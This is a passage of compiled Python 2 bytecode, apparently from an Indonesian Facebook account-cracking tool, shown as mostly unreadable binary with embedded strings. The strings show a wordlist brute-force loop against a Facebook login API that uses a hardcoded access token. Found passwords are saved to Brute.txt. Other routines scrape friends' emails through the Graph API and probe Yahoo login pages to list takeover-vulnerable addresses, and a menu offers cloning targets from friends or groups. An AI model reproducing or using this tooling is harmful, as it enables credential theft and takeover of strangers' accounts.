1\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\x0e\x00\x00\x00?access_token=s\x1e\x00\x00\x00\x1b[1;97m[ \x1b[1;92mDone\x1b[1;97m ] R\xd4\x00\x00\x00s\x03\x00\x00\x00 =>R0\x00\x00\x00s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s\x10\x00\x00\x00out/super_cp.txtRm\x00\x00\x00s\x01\x00\x00\x00\nR\xb5\x00\x00\x00R\xb3\x00\x00\x00t\x07\x00\x00\x00gantengR\xb6\x00\x00\x00(\x12\x00\x00\x00R\x05\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00R4\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\xbb\x00\x00\x00R\xbc\x00\x00\x00R\xbd\x00\x00\x00t\x03\x00\x00\x00oksR\x94\x00\x00\x00R)\x00\x00\x00R\x19\x00\x00\x00Rg\x00\x00\x00R\xdb\x00\x00\x00(\x0e\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00userRm\x00\x00\x00R\xe1\x00\x00\x00t\x05\x00\x00\x00pass1Rl\x00\x00\x00R~\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R7\x00\x00\x00t\x05\x00\x00\x00pass2t\x05\x00\x00\x00pass3t\x05\x00\x00\x00pass4t\x05\x00\x00\x00pass5(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00main;\x05\x00\x00s\x96\x00\x00\x00\x00\x02\x06\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x02\x1b\x01\x12\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x06\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x06\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x18\x02\x03\x01i\x1e\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s.\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal OK/CP \x1b[1;91m: \x1b[1;92ms\x0f\x00\x00\x00\x1b[1;97m/\x1b[1;93ms@\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mCP File saved \x1b[1;91m: \x1b[1;97mout/super_cp.txt(\x1c\x00\x00\x00R/\x00\x00\x00R\xe3\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00R4\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00Rj\x00\x00\x00R\x94\x00\x00\x00R,\x00\x00\x00R\xae\x00\x00\x00Rv\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x00\x00\x00\x00t\x03\x00\x00\x00mapR\xe5\x00\x00\x00R\xdb\x00\x00\x00(\x0f\x00\x00\x00t\x04\x00\x00\x00peakR\'\x00\x00\x00R\x1e\x00\x00\x00R\xa2\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\x13\x00\x00\x00t\x03\x00\x00\x00idgR\xa0\x00\x00\x00R\xa1\x00\x00\x00t\x01\x00\x00\x00pR!\x00\x00\x00R"\x00\x00\x00R\xed\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xe3\x00\x00\x00\xfc\x04\x00\x00s\x88\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\r\x01\x05\x01\n\x01\x13\x01\x12\x01\x11\x01\x18\x01\x0c\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\x1b\x01\x12\x01\x11\x01\x18\x01\x0c\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\x1b\x01\x12\x01\x11\x01\x18\x01\x0c\x01\n\x02\x05\x01\x07\x02\x15\x01\n\x01\x0f\x01\r\x01\x08\x00\r\x00\x11\x01\x01\x01\t\x04\t]\x0c\x01\x10\x01\t\x01\x05\x01)\x01\x05\x01\n\x01c\x00\x00\x00\x00\t\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x8f\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHy\xf9\x01t\n\x00d\x07\x00\x83\x01\x00}\x00\x00t\n\x00d\x08\x00\x83\x01\x00}\x01\x00t\x02\x00|\x01\x00d\x03\x00\x83\x02\x00}\x02\x00|\x02\x00j\x0b\x00\x83\x00\x00}\x02\x00d\t\x00d\n\x00\x14GHd\x0b\x00|\x00\x00\x17GHd\x0c\x00t\x0c\x00t\r\x00|\x02\x00\x83\x01\x00\x83\x01\x00\x17d\r\x00\x17GHt\x0e\x00d\x0e\x00\x83\x01\x00\x01t\x02\x00|\x01\x00d\x03\x00\x83\x02\x00}\x03\x00x{\x01|\x03\x00D]s\x01}\x04\x00yA\x01|\x04\x00j\x0f\x00d\x0f\x00d\x10\x00\x83\x02\x00}\x04\x00t\x10\x00j\x11\x00j\x12\x00d\x11\x00|\x04\x00\x17\x83\x01\x00\x01t\x10\x00j\x11\x00j\x13\x00\x83\x00\x00\x01t\x14\x00j\x15\x00d\x12\x00|\x00\x00\x17d\x13\x00\x17|\x04\x00\x17d\x14\x00\x17\x83\x01\x00}\x05\x00t\x16\x00j\x17\x00|\x05\x00j\x18\x00\x83\x01\x00}\x06\x00d\x15\x00|\x06\x00k\x06\x00r\xc8\x01t\x02\x00d\x16\x00d\x17\x00\x83\x02\x00}\x07\x00|\x07\x00j\x12\x00|\x00\x00d\x18\x00\x17|\x04\x00\x17d\x0f\x00\x17\x83\x01\x00\x01|\x07\x00j\x19\x00\x83\x00\x00\x01d\x19\x00GHd\t\x00d\n\x00\x14GHd\x1a\x00|\x00\x00\x17GHd\x1b\x00|\x04\x00\x17GHt\x1a\x00\x83\x00\x00\x01nq\x00d\x1c\x00|\x06\x00d\x1d\x00\x19k\x06\x00r9\x02t\x02\x00d\x1e\x00d\x17\x00\x83\x02\x00}\x08\x00|\x08\x00j\x12\x00|\x00\x00d\x18\x00\x17|\x04\x00\x17d\x0f\x00\x17\x83\x01\x00\x01|\x08\x00j\x19\x00\x83\x00\x00\x01d\x19\x00GHd\t\x00d\n\x00\x14GHd\x1f\x00GHd\x1a\x00|\x00\x00\x17GHd\x1b\x00|\x04\x00\x17GHt\x1a\x00\x83\x00\x00\x01n\x00\x00Wq\xf3\x00\x04t\x14\x00j\x1b\x00j\x1c\x00k\n\x00re\x02\x01\x01\x01d \x00GHt\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01q\xf3\x00Xq\xf3\x00WWn\x1d\x00\x04t\x05\x00k\n\x00r\x8a\x02\x01\x01\x01d!\x00GHt\x1d\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S("\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00sX\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m s@\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97mi*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s9\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m s\x1f\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m s\x10\x00\x00\x00 \x1b[1;92mPasswords$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x01\x00\x00\x00\nR\n\x00\x00\x00s9\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m: \x1b[1;97ms\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\t\x00\x00\x00Brute.txtR\x11\x00\x00\x00s\x03\x00\x00\x00 | s\x18\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mFounds-\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m s-\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s\x11\x00\x00\x00Brutecekpoint.txts$\x00\x00\x00\x1b[1;91m[!] \x1b[1;93mAccount Checkpoints\x1b\x00\x00\x00\x1b[1;91m[!] Connection Errors\x19\x00\x00\x00\x1b[1;91m[!] File not found(\x1e\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00t\t\x00\x00\x00readlinesR\x17\x00\x00\x00R\x0e\x00\x00\x00R \x00\x00\x00R\x16\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x19\x00\x00\x00R\x1b\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00R\x08\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00t\x06\x00\x00\x00tanyaw(\t\x00\x00\x00R?\x00\x00\x00R\xcb\x00\x00\x00t\x05\x00\x00\x00totalt\x05\x00\x00\x00sandit\x02\x00\x00\x00pwRl\x00\x00\x00R\xdf\x00\x00\x00t\x05\x00\x00\x00dapatt\x04\x00\x00\x00ceks(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xaf\x00\x00\x00\xa3\x05\x00\x00sh\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x03\x01\x0c\x01\x0c\x01\x0f\x01\x0c\x01\t\x01\t\x01\x19\x01\n\x01\x0f\x01\r\x01\x03\x01\x12\x01\x14\x01\r\x01\x1f\x01\x12\x01\x0c\x01\x0f\x01\x19\x01\n\x01\x05\x01\t\x01\t\x01\t\x01\n\x01\x10\x01\x0f\x01\x19\x01\n\x01\x05\x01\t\x01\x05\x01\t\x01\t\x01\x0e\x01\x13\x01\x05\x01\x19\x01\r\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x8f\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x02\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x06\x00k\x02\x00ri\x00t\x03\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x07\x00k\x02\x00r\x7f\x00t\x03\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x08\x00\x00\x00Ns@\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mCreate wordlist ? \x1b[1;92m[y/n]\x1b[1;91m:\x1b[1;97m R\n\x00\x00\x00s\x10\x00\x00\x00\x1b[1;91m[!] WrongRo\x00\x00\x00t\x01\x00\x00\x00YR\xa8\x00\x00\x00t\x01\x00\x00\x00N(\x04\x00\x00\x00R/\x00\x00\x00R\xf3\x00\x00\x00t\x08\x00\x00\x00wordlistRv\x00\x00\x00(\x01\x00\x00\x00t\x03\x00\x00\x00why(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xf3\x00\x00\x00\xd9\x05\x00\x00s\x1c\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x9b\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHt\n\x00\x83\x00\x00\x01d\x00\x00S(\r\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s6\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m With list friends7\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Clone from friends=\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Clone from member groups0\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m Using files*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\x0b\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0b\x00\x00\x00yahoo_pilih(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xb0\x00\x00\x00\xec\x05\x00\x00s"\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xa5\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01nz\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x06\x00k\x02\x00ri\x00t\x04\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x07\x00k\x02\x00r\x7f\x00t\x05\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x08\x00k\x02\x00r\x95\x00t\x06\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\t\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x10\x00\x00\x00\x1b[1;91m[!] WrongR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R:\x00\x00\x00(\x07\x00\x00\x00R/\x00\x00\x00R\xfd\x00\x00\x00t\x0c\x00\x00\x00yahoofriendst\x10\x00\x00\x00yahoofromfriendst\x0b\x00\x00\x00yahoomembert\t\x00\x00\x00yahoolistRv\x00\x00\x00(\x01\x00\x00\x00t\x02\x00\x00\x00go(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xfd\x00\x00\x00\x00\x06\x00\x00s \x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb5\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\t\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\n\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0b\x00GHg\x00\x00}\x00\x00d\x08\x00}\x01\x00t\x0c\x00d\t\x00\x83\x01\x00\x01t\r\x00j\x0e\x00d\n\x00t\x04\x00\x17\x83\x01\x00}\x02\x00t\x0f\x00j\x10\x00|\x02\x00j\x11\x00\x83\x01\x00}\x03\x00t\x02\x00d\x0b\x00d\x0c\x00\x83\x02\x00}\x04\x00t\x0c\x00d\r\x00\x83\x01\x00\x01d\x0e\x00d\x0f\x00\x14GHxw\x01|\x03\x00d\x10\x00\x19D]k\x01}\x05\x00|\x01\x00d\x06\x007}\x01\x00|\x00\x00j\x12\x00|\x01\x00\x83\x01\x00\x01|\x05\x00d\x11\x00\x19}\x06\x00|\x05\x00d\x12\x00\x19}\x07\x00t\r\x00j\x0e\x00d\x13\x00|\x06\x00\x17d\x14\x00\x17t\x04\x00\x17\x83\x01\x00}\x08\x00t\x0f\x00j\x10\x00|\x08\x00j\x11\x00\x83\x01\x00}\t\x00y\xf9\x00|\t\x00d\x15\x00\x19}\n\x00t\x13\x00j\x14\x00d\x16\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x15\x00|\n\x00\x83\x01\x00j\x16\x00\x83\x00\x00}\x0c\x00d\x17\x00|\x0c\x00k\x06\x00rU\x02t\x17\x00j\x02\x00d\x18\x00\x83\x01\x00\x01t\x18\x00t\x17\x00j\x19\x00_\x1a\x00t\x17\x00j\x1b\x00d\x19\x00d\x08\x00\x83\x00\x01\x01|\n\x00t\x17\x00d\x1a\x00<t\x17\x00j\x1c\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\r\x00t\x13\x00j\x14\x00d\x1b\x00\x83\x01\x00}\x0e\x00y\x19\x00|\x0e\x00j\x15\x00|\r\x00\x83\x01\x00j\x16\x00\x83\x00\x00}\x0f\x00Wn\n\x00\x01\x01\x01w\xff\x00n\x01\x00Xd\x1c\x00|\x0f\x00k\x06\x00rU\x02|\x04\x00j\x1d\x00|\n\x00d\x1d\x00\x17\x83\x01\x00\x01d\x1e\x00|\n\x00\x17d\x1f\x00\x17|\x07\x00\x17GHt\x1e\x00j\x12\x00|\n\x00\x83\x01\x00\x01qU\x02n\x00\x00Wq\xff\x00\x04t\x1f\x00k\n\x00ri\x02\x01\x01\x01q\xff\x00Xq\xff\x00Wd\x0e\x00d\x0f\x00\x14GHd \x00GHd!\x00t \x00t!\x00t\x1e\x00\x83\x01\x00\x83\x01\x00\x17GHd"\x00GH|\x04\x00j"\x00\x83\x00\x00\x01t#\x00d#\x00\x83\x01\x00\x01t$\x00\x83\x00\x00\x01d\x00\x00S($\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00i\x00\x00\x00\x00s3\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGetting email friend \x1b[1;97m...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x10\x00\x00\x00out/MailVuln.txtR\x11\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90Rl\x00\x00\x00Rj\x00\x00\x00R0\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R?\x00\x00\x00s\x03\x00\x00\x00@.*s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR>\x00\x00\x00R\xde\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s\x01\x00\x00\x00\ns(\x00\x00\x00\x1b[1;97m[ \x1b[1;92mVULN\xe2\x9c\x93\x1b[1;97m ] \x1b[1;92ms\n\x00\x00\x00 \x1b[1;97m=>s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s(\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal \x1b[1;91m: \x1b[1;97ms=\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m:\x1b[1;97m out/MailVuln.txts\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m](%\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\x94\x00\x00\x00R\xa1\x00\x00\x00t\x07\x00\x00\x00compilet\x06\x00\x00\x00searcht\x05\x00\x00\x00groupRT\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R\\\x00\x00\x00R\x19\x00\x00\x00R\xda\x00\x00\x00R,\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R\xb0\x00\x00\x00(\x10\x00\x00\x00R\xdf\x00\x00\x00t\x03\x00\x00\x00jmlt\x05\x00\x00\x00temant\x05\x00\x00\x00kimakt\x04\x00\x00\x00saveR\x11\x00\x00\x00Rj\x00\x00\x00Rq\x00\x00\x00t\x05\x00\x00\x00linksR\x1e\x00\x00\x00t\x04\x00\x00\x00mailt\x05\x00\x00\x00yahooRp\x00\x00\x00t\x04\x00\x00\x00klikR\x9d\x00\x00\x00t\x03\x00\x00\x00pek(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xfe\x00\x00\x00\x14\x06\x00\x00sr\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x06\x01\x06\x01\n\x01\x13\x01\x12\x01\x0f\x01\n\x01\t\x01\x11\x01\n\x01\r\x01\n\x01\n\x01\x1b\x01\x12\x01\x03\x01\n\x01\x0f\x01\x15\x01\x0c\x01\r\x01\x0c\x01\x10\x01\n\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x07\x01\x0c\x01\x11\x01\x11\x01\x17\x01\r\x01\x08\x01\t\x01\x05\x01\x15\x01\x05\x01\n\x01\n\x01c\x00\x00\x00\x00\x12\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s1\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\t\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\n\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0b\x00GHg\x00\x00}\x00\x00d\x08\x00}\x01\x00t\x0c\x00d\t\x00\x83\x01\x00}\x02\x00y>\x00t\r\x00j\x0e\x00d\n\x00|\x02\x00\x17d\x0b\x00\x17t\x04\x00\x17\x83\x01\x00}\x03\x00t\x0f\x00j\x10\x00|\x03\x00j\x11\x00\x83\x01\x00}\x04\x00d\x0c\x00|\x04\x00d\r\x00\x19\x17GHWn\'\x00\x04t\x12\x00k\n\x00r\x16\x01\x01\x01\x01d\x0e\x00GHt\x0c\x00d\x0f\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xt\x14\x00d\x10\x00\x83\x01\x00\x01t\r\x00j\x0e\x00d\n\x00|\x02\x00\x17d\x11\x00\x17t\x04\x00\x17\x83\x01\x00}\x05\x00t\x0f\x00j\x10\x00|\x05\x00j\x11\x00\x83\x01\x00}\x06\x00t\x02\x00d\x12\x00d\x13\x00\x83\x02\x00}\x07\x00t\x14\x00d\x14\x00\x83\x01\x00\x01d\x15\x00d\x16\x00\x14GHxw\x01|\x06\x00d\x17\x00\x19D]k\x01}\x08\x00|\x01\x00d\x06\x007}\x01\x00|\x00\x00j\x15\x00|\x01\x00\x83\x01\x00\x01|\x08\x00d\x18\x00\x19}\t\x00|\x08\x00d\r\x00\x19}\n\x00t\r\x00j\x0e\x00d\n\x00|\t\x00\x17d\x0b\x00\x17t\x04\x00\x17\x83\x01\x00}\x0b\x00t\x0f\x00j\x10\x00|\x0b\x00j\x11\x00\x83\x01\x00}\x0c\x00y\xf9\x00|\x0c\x00d\x19\x00\x19}\r\x00t\x16\x00j\x17\x00d\x1a\x00\x83\x01\x00}\x0e\x00|\x0e\x00j\x18\x00|\r\x00\x83\x01\x00j\x19\x00\x83\x00\x00}\x0f\x00d\x1b\x00|\x0f\x00k\x06\x00r\xd1\x02t\x1a\x00j\x02\x00d\x1c\x00\x83\x01\x00\x01t\x1b\x00t\x1a\x00j\x1c\x00_\x1d\x00t\x1a\x00j\x1e\x00d\x1d\x00d\x08\x00\x83\x00\x01\x01|\r\x00t\x1a\x00d\x1e\x00<t\x1a\x00j\x1f\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\x10\x00t\x16\x00j\x17\x00d\x1f\x00\x83\x01\x00}\x03\x00y\x19\x00|\x03\x00j\x18\x00|\x10\x00\x83\x01\x00j\x19\x00\x83\x00\x00}\x11\x00Wn\n\x00\x01\x01\x01w{\x01n\x01\x00Xd \x00|\x11\x00k\x06\x00r\xd1\x02|\x07\x00j 